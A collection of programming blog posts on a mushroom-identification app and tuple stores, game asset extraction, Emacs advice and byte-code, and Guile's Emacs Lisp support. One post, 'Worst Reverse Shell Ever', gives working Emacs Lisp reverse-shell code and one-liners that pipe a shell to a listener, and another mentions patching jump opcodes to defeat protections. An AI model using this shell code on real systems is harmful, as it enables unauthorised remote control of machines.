On Fungi and Data Stores

Warning: Rant ahead. Feel free to skip the nstore backend section.

Motivation

I’ve spent the past year looking into the fungi kingdom and the deeper I look, the weirder it gets. One barrier of entry is identifying mushrooms, with two different schools of thought:

  • Carefully observing their features and using a dichotomous key system to narrow down to a manageable set of matches. I found Michael Kuo’s website useful for this.
  • Taking a few photos and letting a neural network analyze them.

I’m not a fan of the latter approach for various reasons. You’re at the mercy of the training set quality, it’s easy to subvert them and they’re essentially undebuggable. I also found that Wikipedia has basic identification data on mushrooms. Therefore I thought it to be a fun exercise to build my own web application for quickly narrowing down interesting Wikipedia articles to read. You can find the code over at https://depp.brause.cc/brause.cc/wald/, with the web application itself hosted on https://wald.brause.cc/.

Data munging

The mushroom data uses so-called mycomorphboxes to hold their characteristics. Using the Wikipedia API one can query for the latest revision of every page containing a mycomorphbox template and fetch its contents in the form of JSON and Wiki markup.

While I like writing scrapers, I dislike that the programs tend to be messy and require an online connection for every test run. I used the chance to try out the ETL pattern, that is, writing separate programs that perform the extraction (downloading data from the service while avoiding tripping up API limits), transformation (massaging the data into a form that’s easier to process) and loading (putting the data into a database). I quite like it. Each part has its own unique challenges and by sticking to a separate program I can fully focus on it. Instead of fetching, transforming and loading up the data every time, I focus on fetching it correctly to disk, then transform the dump to a more useful form, then figure out how to load it into the database. If more patterns of that kind emerge, I can see myself writing utility libraries for them.

Data stores

There were two obvious choices for storing the data:

  • Keeping it as JSON and just writing ugly code traversing the parse tree.
  • Using SQLite because it’s a fast and reliable solution. That is, once you’ve come up with a suitable schema fitting the problem at hand.

I wanted to try out something different this time, though - something other than JSON or a relational database. Perhaps something in the NoSQL realm that’s both pleasant to use and comes with a query language. Or maybe some dumb key-value store to speed up loading and dumping the data. I ended up going with a tuple store, but I’m still considering to give graph and document databases a try. Here’s some benchmark figures for querying all available filters and filtering species with a complicated query:

[wasa@box ~]$ time DB=json ./benchmark mushrooms.json >/dev/null
Filters: 14898.5027832031μs
Query stats: 1808.65561523438μs
DB=json ./benchmark mushrooms.json > /dev/null  1.37s user 0.09s system 98% cpu 1.480 total
[wasa@box ~]$ time DB=sqlite ./benchmark db.sqlite3 >/dev/null
Filters: 214.554809570313μs
Query stats: 3953.87497558594μs
DB=sqlite ./benchmark db.sqlite3 > /dev/null  0.24s user 0.01s system 96% cpu 0.253 total
[wasa@box ~]$ time DB=nstore ./benchmark db.lmdb >/dev/null
Filters: 355414.137402344μs
Query stats: 407887.70847168μs
DB=nstore ./benchmark db.lmdb > /dev/null  8.15s user 0.05s system 99% cpu 8.250 total

Bonus: There should be no hardcoded storage solution, but the possibility to choose it at runtime. This would hopefully not complicate things too much and encourage cleaner design. For this I came up with a simple API revolving around establishing/closing a database connection, performing a transaction on that connection and querying filters/species on a transaction.

JSON backend

This was rather braindead code. It’s far from pretty, but does the job surprisingly well. Queries are acceptably fast, so it makes for a nice fallback. Initial loading time is a bit slow though, using a key-value store like LMDB would help here. Maybe it’s time for a binary Scheme serialization solution along the lines of Python’s pickle format, but without the arbitrary code execution parts

SQLite backend

It took considerable time to get the schema right. I ended up asking another SQL expert for help with this and they taught me about EAV tables. Another oddity was that the database only performed properly after running ANALYZE once. The code itself is relatively short, but makes use of lots of string concatenation to generate the search query.

nstore backend

Retrospectively, this was quite the rabbit hole. I ignored the warning signs, persisted and eventually got something working. But at what cost?

My original plan was to use a graph database like Neo4j. I’ve seen it used for analysis of social graphs, Active Directory networks and source code. It’s powerful, though clunky and oversized for my purposes. If I can avoid it, I’d rather not run a separate Java process and tune its garbage collection settings to play well with everything else running on my VPS. On top of that I’d need to write a database adaptor, be it for their HTTP API or the Bolt protocol. If you’re aware of a comparable in-process solution, I’d be all ears. It doesn’t even need to do graphs (the data set doesn’t have any connections), a JSON store with a powerful query language would be sufficient.

I asked the #scheme channel on Freenode about the topic of graph databases and was told that tuple stores have equivalent power, while being considerably easier to implement. SRFI-168 describes a so-called nstore and comes with a sample in-memory implementation depending on SRFI-167 and a few others. Getting it running seemed like an ideal weekend exercise. Or so I thought. I’ve run into the following obstacles and weeks turned into months of drudgery:

  • The specifications themselves are of subpar quality. It seems little proofreading was done. There are minor errors in the language and several unclear parts and outright design mistakes that render parts of the library unusable. Unfortunately I noticed this long after the SRFI has been finalized. While the process allows for errata, it took some back and forth to get the most egregious faults in SRFI-167 fixed. Some faults remain in SRFI-168 and the sample implementation is incompatible with SRFI-167 due to an API change.
  • There is no such thing as a query language. You get basic pattern matching and SRFI-158 generators. Everything else, like grouping results or sorting them, you must do yourself. For this reason the nstore implementation is a bit more verbose than the JSON one. Relevant webcomic.
  • The sample implementation itself depends on several other SRFIs, most of which I had to port first. Granted, I only did this because I wanted to contribute them properly to the CHICKEN coop, but it was still bothersome. I hacked on SRFI-125, SRFI-126, SRFI-145, SRFI-146, SRFI-158, SRFI-167, SRFI-168 plus alternative versions of SRFI-125 (using a portable hash tables implementation instead of the stock one) and SRFI-167 (using LMDB for its backend).
  • Some of the SRFIs were particularly difficult to port. SRFI-125 turned out to neither work with stock hash tables (they’re incompatible with R6RS-style APIs) nor the R6RS-style hash table implementation provided by SRFI-126 (the stock implementation fails with custom comparators and the portable SRFI-69 implementation runs into an infinite loop when executing the test suite). SRFI-167 requires a custom backend for on-disk storage, I initially messed around with Sophia for this (turned out to be unusable) and eventually settled for a LMDB-backed implementation. The SRFI-167 and SRFI-168 eggs deviate from the official APIs and have therefore not been published. For this reason only SRFI-145, SRFI-146 and SRFI-158 have been added to the coop.
  • During the time I worked on the project, some of the links pointing towards documentation, implementations and example code broke and pointed nowhere. When I communicated with the author, I got the impression they had become dissatisfied with the project and wanted to start over on a clean slate. Links have been replaced, but some code has been permanently lost. Most recently they admitted they don’t have any working implementation of SRFI-167 and SRFI-168 at hand. I consider this a deeply troubling sign for the health of the project and therefore discourage anyone from relying on it.
  • Once I actually got everything running with LMDB for the backing store, I was surprised to see awful overall performance. Even with JSON a query takes only a few milliseconds, whereas here it’s two orders of magnitude more. I did some light profiling and identified hot paths in both SRFI-128 and SRFI-167. For this reason the web application is currently using the SQLite backend.
  • The APIs themselves are kind of clumsy. I worked around this with my data storage abstraction, but it’s still something to look out for. If you compare it to clojure.jdbc or the sql-de-lite egg, there’s a few obvious usability improvements to be done.
  • Eventually, after criticism from other people, the entire SRFI was considered to be withdrawn. It hasn’t been withdrawn so far as the process requires a replacement SRFI. I believe this to be a mistake.
  • The SRFI process in general has accelerated in the last few years due to R7RS-large making heavy use of it for its dockets. There is the occasional SRFI among them that is too ambitious in scope and bound to become outdated. I believe this to be an abuse of the standardization process, instead there should be experimentation on a decoupled platform such as Snow or Akku. Once the project has been approved by the community and implemented by several Scheme systems, it can be considered for standardization. The pre-srfi repository lists a few upcoming projects of that kind, such as HTTP servers/clients, a P2P network proposal, a web UI library and Emacs-style text manipulation. I’m doubtful they will be anywhere as successful as existing non-portable Scheme libraries.

Needless to say that I’ve become increasingly frustrated over time. To the SRFI-168 author’s credit, they’ve always been civil, recognized the design mistakes and are working on a less ambitious replacement library. While I do regret the time that went into this adventure, I have learned a few lessons:

  • LMDB and key-value stores in general are great. They’re easy to comprehend, have fast load times and can be a quick and dirty solution when dealing with relational models is complete overkill. I’m not sure whether ordered key-value stores are worth it though.
  • While it’s true that tuple stores are roughly equivalent in power to graph databases, graph databases still have the edge. Mind you though, this piece has been written by a Neo4j person, so it’s most likely biased. Still, I’m inclined to believe their claims.
  • Portable code is cool, but it cannot compete with highly tuned solutions. Do not expect a sample implementation of a database to rival SQLite and friends.

Web frontend

I assumed this part to be way harder, but it only took me two days of hacking without any sort of web framework backing it. I do miss some of the conveniences I learned from writing Clojure web applications though:

  • I had to write my own database abstraction instead of using clojure.jdbc and a connection string. On top of that there’s ugly code to detect which database to use and perform a dynamic import.
  • Stuart Sierra’s component library gives you easy dependency injection. For example you can access configuration and database connections from a HTTP handler directly instead of having to use global or dynamically bound variables.
  • A ring-style API with a request/response alist and middleware manipulating them would improve discoverability considerably. It’s no deal breaker though.

Further thoughts

I’d have expected this project to suck any remaining enthusiasm for writing web applications out of me, but it didn’t. While I’m not sure whether I’ll stick to Scheme for them, I could see myself doing another one soonish. I think I’ll abstain from investing more time into databases though and hack on something else for the time being.


Lost In Space

My relationship with games is complicated. I never had the chance to get good at them and few I’ve played have been any good. Despite that, I had both the urge to complete the game and discover how they work internally. As nearly all commercially developed games happen to be proprietary, I focused on viewing and extracting their asset files, an art not unlike reverse engineering of executable files.

Fast-forward many years and I still occasionally play games. At least I have proper tools at hand now and the knowledge to make sense of binary formats. Another plus is that people have come to discover the benefits of the open source spirit to collaborate and share their knowledge online. Recently I’ve taken a closer look at a certain meme game in my Steam library. Many of its assets (music, sound effects, fonts and a single texture) are stored as regular files on disk, however, there’s an 79M asset file, presumably holding the missing textures for the game sprites and backgrounds. This blog post will explore its custom format and inner workings in enough detail to write your own extraction program.

Reconnaissance

For starters I’ve opened the file in my favorite hex editor editor and browsed through it, looking for obvious patterns such as human-readable strings, repetitive byte sequences and anything not looking like random noise. I’ve found the following:

  • A very short header that doesn’t contain any human-readable file signatures.
  • Several file paths, each terminated with a null byte.
  • Several 16-byte entries, with columns lining up almost perfectly.
  • Several concatenated files, identified by file signatures for the WebP, PNG and XML formats.

Here’s some screenshots, with the relevant patterns highlighted:

Header and paths section:

/img/nyancat-header-paths.png

Mysterious 16-byte entries, with many even-numbered columns being zeroes[1]:

/img/nyancat-index-patterns.png

WebP file header in files section:

/img/nyancat-files-webp.png

XML file header in files section:

/img/nyancat-files-xml.png

PNG file header in files section:

/img/nyancat-files-png.png

Given the information so far, several hypotheses can be established:

  • The number of paths is the same as the number of embedded files and every path corresponds to an embedded file.
  • The file contains information about how long each embedded file is.
  • The mystery section (which I’ll call the index from now on) contains that information in each of its 16-byte entries
  • Each of these entries corresponds to a path and embedded file.
  • The association between path, entry and embedded file is ordered, for example the first path corresponds to the first entry and first embedded file.

Verification

Each hypothesis can be proven by doing basic mathematics. The most fundamental assumptions the format relies upon are the number of paths, index entries and embedded files being the same, and the length of each embedded file being stored somewhere else in the file, presumably the index section. I decided to start with the latter, for which I picked the first embedded file, a WebP image[2]. Its length can be determined by looking at bytes 4 to 7, decoding them as unsigned little-endian 32-bit integer and adding 8 to include the length of the preceding header. The obtained length can be verified by seeking to the beginning of the file in the hex editor, then seeking by the length[3] and checking whether that position corresponds to the start of the next file. Likewise, the length of a PNG file can be obtained by looking for the IEND sequence followed by a 32-bit checksum and for XML files by looking for the closing tag.

The first file is 2620176 bytes long and is immediately followed by a XML file describing it. It corresponds to either 0027fb10 or 10fb2700 when encoded to hex, depending on whether it’s big- or little-endian. And indeed, the latter value shows up in the last 4 bytes of the first 16-byte entry. I’ve then subsequently verified whether this property holds true by extracting the file length from the second 16-byte entry and applying it to the second embedded file.

This left verifying the number of embedded files by counting the number of paths and entries in their respective sections. I’ve found 335 of them in each, represented as 4f010000 using the previously encountered little-endian hex notation. That number corresponds to bytes 4 to 7 in the header, leaving two 4-byte numbers around it. I haven’t been able to deduce the meaning of the preceding one, but the succeeding one is a6210000 which corresponds to 8614, the length of all paths immediately following the file header, thereby giving me all information necessary to extract the assets.

Extraction

The file format deduced so far:

# header
#   4-byte integer (unknown)
#   4-byte integer (number of filenames)
#   4-byte integer (length of filenames section)
# paths
#   null terminated string (path)
#   repeat count times
# index
#   4-byte integer (unknown)
#   4-byte integer (unknown)
#   4-byte integer (unknown)
#   4-byte integer (file length)
#   repeat count times
# data
#   file length bytes
#   repeat count times

Expressed in pseudo code:

read_integer()
filenames_count = read_integer()
filenames_length = read_integer()
filenames = read_bytes(filenames_length).split("\x00")
index = []

for i in range(filenames_count):
    read_integer()
    read_integer()
    read_integer()
    file_length = read_integer()
    index[i] = [filenames[i], file_length]

for entry in index:
    data = read_bytes(index[1])
    write_bytes(index[0], data)

A reward you’ve earned:

/img/nyancat-texture-yodacat.png

Further thoughts

Performing the analysis and writing the extraction program took me a few hours. It could have been a lot trickier, especially if my goal was to perform game modding. This would require to extract the files, modify them, then repack them back into the asset file without the game noticing a change. To do this safely, it’s necessary to perform deeper analysis of the unknown fields, for example by looking into other matching metadata of every embedded file or by reverse engineering the game itself.

Another common problem is that data doesn’t always form clear patterns, for example if it’s encrypted, compressed or random-looking for other reasons. Sometimes formats are optimized towards programmer convenience and may store data necessary to verify the asset file inside the game instead. This would again not pose a challenge to a reverse engineer, but would still complicate automatic extraction.

Sometimes team work is necessary. Chances are that tools have been developed for popular games and may only need minor adjustments to get working again. One resource I’ve found immensely helpful to gain a better understanding of common patterns is The Definitive Guide To Exploring File Formats.

[1]radare2 can shift the file contents around in visual mode by using the h and l movement keys. This is useful to force the entries to align into the expected columns.
[2]The first path suggests a PNG file, but the first embedded file used the WebP format. This threw me off for a while, my working theory is that the artist mislabeled WebP files as PNGs and the game engine they’ve used auto-detected their contents without any hitch. Good for them!
[3]radare2 offers the s+ command for this purpose.

A Piece of Advice

Update: Added a helpful link explaining more opcodes.

Note: This is an expanded version of this Reddit post.

Advice is one of those Emacs Lisp features that you don’t see often in other programming languages. It enables you to extend almost any function you’d like by executing code before/after/instead of it and messing with arguments/return values. But how does it work? And which of the two implementations of it should be used?

On advice.el

Somewhat surprisingly, advice.el consists of more than 3000 lines, but more than half of them are comments. It doesn’t quite reach literate programming level of commentary, but explains its internals and includes a small tutorial explaining how it works. There are many bells and whistles, but to keep things simple I’ll focus on the part of the tutorial that changes a function to manipulate its argument before execution of the function body. That body can be programmatically obtained using symbol-function:

(defun foo (x)
  "Add 1 to X."
  (1+ x))

(symbol-function 'foo)
;; => (defun foo (x) "Add 1 to X." (1+ x))

The example advice fg-add2 adds one to x again before the actual code is run:

(defadvice foo (before fg-add2 first)
  "Add 2 to X."
  (setq x (1+ x)))

(symbol-function 'foo)
;; #[128 "<bytecode>"
;;   [apply ad-Advice-foo (lambda (x) "Add 1 to X." (1+ x)) nil]
;;   5 nil]

Yikes. How does one make sense of the byte-code?

Interlude: Byte-code disassembly

Emacs Lisp contains two interpreters, a tree walker (takes a s-exp as input, walks along it and evaluates the branches) and a byte-code interpreter (takes bytecode, interprets it using a stack VM). bytecomp.el and byte-opt.el transform s-expressions into optimized byte-code. I can recommend studying these to understand how a simple compiler works. The result of this is code expressed in a stack-oriented fashion using up to 256 fundamental operations[1]. One can look at it with the disassemble function, which accepts both function symbols and function definitions:

(disassemble (lambda () 1))
;; byte code:
;;   args: nil
;; 0       constant  1
;; 1       return

What happens here is that the constant 1 is pushed to the stack, then the top of stack is returned. Arguments are treated in a similar manner:

(disassemble (lambda (x) x))
;; byte code:
;;   args: (x)
;; 0       varref    x
;; 1       return

Instead of putting a constant on the stack, the value of x is looked up and pushed to the stack. Finally, an easy function call looks as follows:

(disassemble (lambda (a b) (message "%S: %S" a b)))
;; byte code:
;;   args: (a b)
;; 0       constant  message
;; 1       constant  "%S: %S"
;; 2       varref    a
;; 3       varref    b
;; 4       call      3
;; 5       return

Four values are pushed on the stack in function call order, then a function is called with three arguments. The four stack values are replaced with its result, then returned. We’re almost ready to tackle the actually interesting disassembly now and can look up all other unknown opcodes in this unofficial manual.

You may wonder though, why bother? Why not just use a decompiler? Or even avoid dealing with byte-compiled code in the first place… It turns out there are a few reasons going for it:

  • Ideally you’d always have access to source code. This is not always an option. For example it’s not unheard of for an Emacs installation to only ship byte-compiled sources (hello Debian). Likewise defining advice as above will byte-compile the function. Byte-code compilation is done as performance enhancement and backtraces from optimized functions will contain byte-code.
  • The byte-code decompiler we have is clunky and incomplete. It sometimes fails to make sense of byte-code, meaning you cannot rely on it. Another thing to consider is that byte-code doesn’t have to originate from the official byte-code compiler, there’s other projects generating byte-code that the decompiler may not target. Suppose someone wants to thwart analysis of (presumably malicious code), hand-written byte-code would be an option.
  • Sometimes byte-code is studied to understand the performance of an Emacs Lisp function. It’s easier to reason about byte-code than regular code, especially to see the effects of lexical binding.
  • It’s educational to wade through bytecode.c and other Emacs internals. While there isn’t too much benefit of understanding Emacs byte-code, the same lessons apply to other stack-oriented VMs, such as the JVM. Learning this makes reversing proprietary programs targeting the JVM (such as Android apps) much easier and enables advanced techniques such as binary patching[2].

On advice.el (continued)

We’re ready to unravel what foo does:

(disassemble 'foo)
;; byte code for foo:
;;   args: (x)
;; 0       constant  apply
;; 1       constant  ad-Advice-foo
;; 2       constant  (lambda (x) "Add 1 to X." (1+ x))
;; 3       stack-ref 3
;; 4       call      3
;; 5       return

apply, ad-Advice-foo and a lambda are placed on the stack. Then, stack element 3 (zero-indexed) is added to the top of stack. We already know that elements 0, 1 and 2 are the three constants, element 3 however is the first argument passed to the function. As it turns out, when lexical binding is enabled, the stack-ref opcode is used instead of varref. Therefore the byte-code presented is equivalent to (lambda (&rest arg) (apply 'ad-Advice-foo (lambda (x) "Add 1 to X." (1+ x))) arg). You can verify by disassembling that lambda and compare the output with the previous disassembly.

What does ad-Advice-foo do though?

(disassemble 'ad-Advice-foo)
;; byte code for ad-Advice-foo:
;;   args: (ad--addoit-function x)
;; 0       constant  nil
;; 1       varbind   ad-return-value
;; 2       varref    x
;; 3       add1
;; 4       varset    x
;; 5       varref    ad--addoit-function
;; 6       varref    x
;; 7       call      1
;; 8       dup
;; 9       varset    ad-return-value
;; 10      unbind    1
;; 11      return

This is a bit more to unravel. varbind introduces a temporary variable, unbind undoes this binding, varset is equivalent to set and dup pushes a copy of top of stack (kind of like stack-ref 0 would do). The sequence of constant nil and varbind ad-return-value is the same as (let ((ad-return-value nil)) ...). x is retrieved, incremented by 1 and x set to the result of that, therefore (setq x (1+ x)). Then ad--addoit-function is called with x as argument. The result of that is duplicated and ad-return-value is set to it. Finally stack item 1 is unbound, presumably the temporary variable. Therefore the byte-code is equivalent to (let (ad-return-value) (setq x (1+ x)) (setq ad-return-value (funcall ad--addoit-function x))). Let’s see how nadvice.el fares.

On nadvice.el

It’s tiny compared to advice.el, at only 391 lines of code. To nobody’s surprise it’s lacking bells and whistles such as changing argument values directly or not activating advice immediately. Therefore some adjustments are required to create the equivalent advice with it:

(defun foo-advice (args)
  (mapcar '1+ args))

(advice-add 'foo :filter-args 'foo-advice)

(symbol-function 'foo)
;; #[128 "<bytecode>" [apply foo-advice (lambda (x) "Add 1 to X." (1+ x)) nil] 5 nil]

(disassemble 'foo)
;; byte code for foo:
;;   args: (x)
;; 0       constant  apply
;; 1       constant  (lambda (x) "Add 1 to X." (1+ x))
;; 2       constant  foo-advice
;; 3       stack-ref 3
;; 4       call      1
;; 5       call      2
;; 6       return

We have our three constants and x on the stack. At first a function is called with one argument, that would be foo-advice with x (which represents the argument list). Then a function is called with two arguments, that is apply with the lambda and the result of the previous function call. In other words, (lambda (&rest x) (apply (lambda (x) "Add 1 to X." (1+ x)) (foo-advice x))). It was a bit less convenient to write, but far easier to understand.

Conclusion

nadvice.el is surprisingly elegant, striking a good balance between amount of overall features and technical simplicity. Unless you maintain a package that must keep compatibility with Emacs 24.3 or earlier, I don’t see a good reason to go for advice.el.

[1]Or in short, opcode. A byte represents up to 256 values, hence the “byte-code” name.
[2]Simple protections rely on checking a conditional and executing good/bad code. This tends to compile down to a conditional jump. Switch out the jump opcode for the opposite one and it will execute bad/good code instead…

Worst Reverse Shell Ever

Every now and then there’s someone asking about Emacs and security, especially when it comes to the question whether one can trust packages. Short answer: No. Long answer: This question cannot be answered without defining a threat model first, but honestly, who is going to bother backdooring an Emacs package?

Yet some lingering doubt remains. There are Emacs users after all who are high-profile enough to bother attacking. Suppose you wanted to write malware in Emacs Lisp, one obvious thing to try after gaining the ability of arbitrary code execution is a remote shell to comfortably execute commands on someone else’s computer. There are two flavors of them:

Bind shell:
The victim computer listens on LPORT and the attacker connects to LHOST:LPORT. Any user input from the attacker is sent to a local shell, output from that shell is returned to the attacker.
Reverse shell:
The victim computer establishes a connection to the attacker listening at RHOST:RPORT. Much like with the bind shell, user input from the attacker is interpreted by a local shell.

Reverse shells are more popular as they allow circumventing restrictive firewall rules. There are several cheatsheets for spawning them with a Bash/Python/Ruby/Perl/… oneliner, most of those rely on creating a socket, extracting its file descriptor and wiring it up to a shell process. Unfortunately Emacs doesn’t give you that information, so I’ve had to settle for a less elegant approach. Here’s my first attempt using shell-command-to-string to execute the received process output and process-send-string to send it back to the process[1]:

(let ((r (make-network-process :name "r"
                               :host "127.0.0.1"
                               :service 8080)))
  (set-process-filter r (lambda (p s)
                          (process-send-string p (shell-command-to-string s))))
  (read-char))

To test it, launch nc -nlvp 8080 (for GNU netcat) or nc -nlv 8080 (for BSD netcat), save the above to test.el and run emacs --script test.el. It works, but is sub-optimal for a few reasons:

  • A new shell is spawned every time a batch of user input has been read. Due to this, changing the directory doesn’t appear to have any effect.
  • The shell seems unresponsive when executing commands generating large output (for example find /) as shell-command-to-string collects everything before returning the entirety of it.
  • If the chunk of user input received by the process filter doesn’t resemble a valid shell command (for example by being broken up at an inconvenient spot), it won’t be executed as expected and might raise an incomprehensible error.

To fix these issues a dedicated shell subprocess needs to be created. Output from the network process is sent to the shell subprocess and vice versa. This makes for slightly longer code:

(let ((r (make-network-process :name "r"
                               :host "127.0.0.1"
                               :service 8080))
      (c (start-process "s" nil "sh" "-i")))
  (set-process-filter r (lambda (_ s) (process-send-string c s)))
  (set-process-filter c (lambda (_ s) (process-send-string r s)))
  (read-char))

Voila, cd works as expected and the hangs for find / are gone as well. Time to optimize both for shell oneliners, for that I eliminate whitespace and carefully adjust the logic[2]:

emacs --batch --eval '(set-process-filter(make-network-process :name"r":host"127.0.0.1":service 8080)(lambda(p s)(process-send-string p (shell-command-to-string s))))' -f read-char
emacs --batch --eval '(progn(setq r(make-network-process :name"r":host"127.0.0.1":service 8080)c(start-process"s"nil"sh""-i"))(set-process-filter r(lambda(_ x)(process-send-string c x)))(set-process-filter c(lambda(_ x)(process-send-string r x))))' -f read-char

These clock in at 180 and 261 chars respectively. Not too shabby compared to the usual Python/Ruby/Perl oneliners (243/104/216 chars). Unlike them though I cannot upgrade the reverse shell to a fully interactive one. But who knows, maybe they’ll come in useful some day if I ever encounter a machine not having common programming languages installed, but Emacs for some reason…

[1]Originally this used (while t (sleep-for 0.1)), but thblt pointed out (read-char) as shorter alternative. Bonus: As it’s the last form and takes no arguments, it can be invoked from the Emacs command line with -f read-char.
[2]An obvious optimization I’ve not ended up doing, is using something like (fset 's 'process-send-string) to shorten any lengthy identifiers used more than once; however it doesn’t pay off as the code now contains both single and double quotes. While it is possible to write a shell oneliner with them, extra attention must be paid to quote both kinds correctly. Unless one uses something like the printf command or bash’s $'O\'connor.' notation, escaping the four single quotes ends up requiring more characters than without the optimization.

State of Emacs Lisp on Guile

Update: Factual corrections to Robin Templeton’s work.

Update: Added an extra set of benchmarks for Guile 3 in a Debian Sid Docker container.

Disclaimer: I don’t use Guile. I hardly know it. There are other Scheme implementations I know far better. But since Guile Emacs is a hot topic with much hopes and unproven claims, I experiment with it every now and then. All “benchmark” results here are to be taken with caution, they’ve been created using Guile 2.2.6 and Emacs 26.3 on a Thinkpad X230t running Arch Linux.

With that out of the way, laurus from #emacs[1] reminded me that one of the reasons why Guile Emacs was possible in the first place is Guile’s language tower, with Emacs Lisp being one of the supported languages. But what does that mean? How complete is the Emacs Lisp support? What can it be used for? These and a few other questions are the topic of this blog post.

In need of a spec

Standardized programming languages have the great benefit of being based on a specification one can consult whenever in doubt of how things are supposed to behave. This allows several competing implementations to be developed, with their own unique strengths and benefits. if you adhere to the standard, switching between implementations isn’t hard and can help shaking out bugs, for example when compiling your C programs with different compilers.

Things get considerably harder if your chosen language decided to forego this approach and the correct behavior is defined by it, yet this didn’t stop people from writing alternative implementations for programming languages such as Python and Ruby. Emacs Lisp got into a similar situation ever since Guile was extended to the degree of supporting Emacs Lisp as an additional language. Provided your version of Guile is new enough, you can evaluate trivial code in the REPL:

scheme@(guile-user)> (define foo 1)
scheme@(guile-user)> foo
$1 = 1
scheme@(guile-user)> ,L elisp
Happy hacking with Emacs Lisp!  To switch back, type `,L scheme'.
elisp@(guile-user)> (defvar bar 2)
$2 = bar
elisp@(guile-user)> bar
$3 = 2

So far so good. But how much of Emacs Lisp is supported? Not much apparently, many common functions like message and error are unbound. It doesn’t seem possible to do anything with buffers or files either. This greatly limits the possibilities of writing useful scripts in Emacs Lisp[2]. One way of determining what exactly is supported would be consulting the source code, but where’s the fun in that when you could instead test it programmatically, thereby creating an executable spec…

Generating the spec

The usual test approaches fail me. Reading test inputs via stdin with read-string? Accessing the arguments with argv? Reading from a file with insert-file-contents? Obtaining an environment variable with getenv? None of that is supported. At least you can print to stdout with princ. I went for a slightly different approach instead, obtain a list of functions/variables[3] in a minimal Emacs environment, then generating a test file that checks their existence and prints a test summary. Here’s the code generation part:

(defun printf (fmt &rest args)
  (princ (apply 'format fmt args)))

(printf ";; elisp spec adherence test
(defvar passed 0)
(defvar failed 0)
(defun test-sym (pred sym)
  (if (funcall pred sym)
      (setq passed (1+ passed))
    (setq failed (1+ failed))))
(defun test-fun (sym) (test-sym 'fboundp sym))
(defun test-var (sym) (test-sym 'boundp sym))\n\n")

(mapatoms
 (lambda (atom)
   (when (fboundp atom)
     (printf "(test-fun '%S)\n" atom))
   (when (and (not (keywordp atom)) (boundp atom))
     (printf "(test-var '%S)\n" atom))))

(printf "\n")
(printf "(princ \"Passed: \")\n")
(printf "(princ passed)\n")
(printf "(terpri)\n")
(printf "\n")
(printf "(princ \"Failed: \")\n")
(printf "(princ failed)\n")
(printf "(terpri)\n")

Assuming it’s been saved as gen-elisp-spec.el, the executable spec itself is generated with emacs -Q --batch --script gen-elisp-spec.el > elisp-spec.el. Here’s a test session using Emacs and Guile:

[wasa@box ~]$ time emacs -Q --batch --script elisp-spec.el
Passed: 9567
Failed: 2
emacs -Q --batch --script elisp-spec.el  0.10s user 0.02s system 99% cpu 0.117 total
[wasa@box ~]$ time guile --language=elisp elisp-spec.el
Passed: 137
Failed: 9432
guile --language=elisp elisp-spec.el  77.62s user 0.27s system 103% cpu 1:15.04 total

This is kind of surprising. I didn’t expect Emacs to fail its own test and didn’t expect Guile to implement this little either. Most surprising is the abysmal speed of the test[4], I’m looking forward to anyone being able to explain that part to me. Here’s one more test using the official Debian Sid Docker image with Emacs 26.3 and Guile 3.0.2:

root@d27668492764:/# time emacs -Q --batch --script elisp-spec.el
Passed: 9108
Failed: 2

real    0m0.104s
user    0m0.097s
sys     0m0.007s
root@d27668492764:/# time guile --language=elisp elisp-spec.el
Passed: 137
Failed: 8973

real    6m20.950s
user    10m32.294s
sys     0m7.846s

This is not exactly an improvement. At least the numbers are small enough to print out the offending symbols, for Emacs it’s atom and printf (which polluted the test environment), for Guile I’ve taken the liberty of annotating the list:

;; binding
let let*
;; functions
lambda apply funcall
;; evaluation
eval load eval-and-compile eval-when-compile
;; sequences
aref aset make-vector nth
;; sequencing
progn prog2 prog1
;; iteration
dolist while
;; control flow
if when unless cond
;; short-circuiting
or and not
;; explicit nonlocal exit
throw catch
;; exceptions
signal condition-case unwind-protect
;; input
read-from-minibuffer
;; output
prin1-to-string print princ send-string-to-terminal terpri
;; cxr
car cdr caar cadr cdar cddr
car-safe cdr-safe
nthcdr
;; associations
assoc assq
;; search
member memql memq
;; destructive list processing
nreverse setcar setcdr rplaca rplacd
;; other list processing
cons list make-list `
mapcar mapc
append concat
reverse
length
;; symbols
defconst defvar defun defmacro
get put
fset set setq setplist
symbol-function symbol-name symbol-plist symbol-value
intern make-symbol
fmakunbound makunbound
quote function
;; plist
plist-get plist-put
lax-plist-get lax-plist-put
plist-member
;; strings
string string-match substring
upcase downcase
;; predicates
zerop floatp stringp numberp integerp wholenump
boundp fboundp functionp symbolp
consp listp nlistp
atom null
;; math
1+ 1-
fceiling ffloor ftruncate fround float
abs
min max
;; comparators
> < >= <= /= =
eq eql equal
string-equal string=
;; numerical operators
+ - * %
;; misc
random

Some notable omissions and differences:

  • No division. Most likely incompatible with Scheme’s numeric tower.
  • Input is read with read-from-minibuffer, not read-string.
  • send-string-to-terminal is unusual to have, but most likely the primitive output function.
  • string-match is nice to have, but of limited use without match-string.
  • prin1-to-string exists, prin1 doesn’t.
  • print doesn’t add newlines and behaves like prin1 should.

To do anything outside of textbook exercises you’d need to define extra primitives. Guile’s module/language/elisp/boot.el shows how to apply a band-aid on some of the previous shortcomings:

(fset '/ (@ (guile) /))
(fset 'read-string 'read-from-minibuffer)
(fset 'prin1 (@ (guile) write))
(defun print (object) (prin1 object) (terpri))

You could write more of it to reach that goal of using Emacs Lisp as scripting language outside of Emacs, but need to write Scheme to get there. Why not just use Scheme? Why invent a new runtime? The effort would be comparable to what node.js did for Chrome’s JavaScript engine, except with a far weaker sales-pitch.

What does this mean for Guile Emacs?

What I’ve shown above is barely sufficient to bootstrap an Emacs on top of it. Guile Emacs requires a customized version of Guile and Emacs, then loads up the supporting Emacs Lisp files to do the rest. There are more incompatibilities, like called-interactively-p being stubbed out. Extending the presented rudimentary spec to contain actual tests would help with tracking progress and usability. It might even improve the overall quality of GNU Emacs itself, provided that the core developers are on board and believe in the idea. I’ve briefly searched emacs-devel for previous discussion on the topic, but only found bikeshedding about Guile Emacs itself, so anyone who feels strongly about the subject, feel free to start a discussion there!

With regards to Guile Emacs itself, the situation is trickier. The above repositories have not been touched for five years, with Robin Templeton being the sole contributor for five Google Summer of Code events. Even though the work is far from complete, it is impressive what a college student managed to do under supervision of Guile’s maintainer Andy Wingo and Ludovic Courtès. Further advancements require similarly motivated individuals to participate in the Guile community and become part of the effort, much like with other free software projects. It’s tempting to take a shortcut like donating to other developers, but unless they’ve figured out a way of converting that money into equivalent work, there will be little connection between what you give away and what they do in return. This again is a topic worth discussing, preferably with the people that can make a change.

[1]laurus did some research as well, you can find an interesting discussion on the #guile channel: http://logs.guix.gnu.org/guile/2020-05-16.log
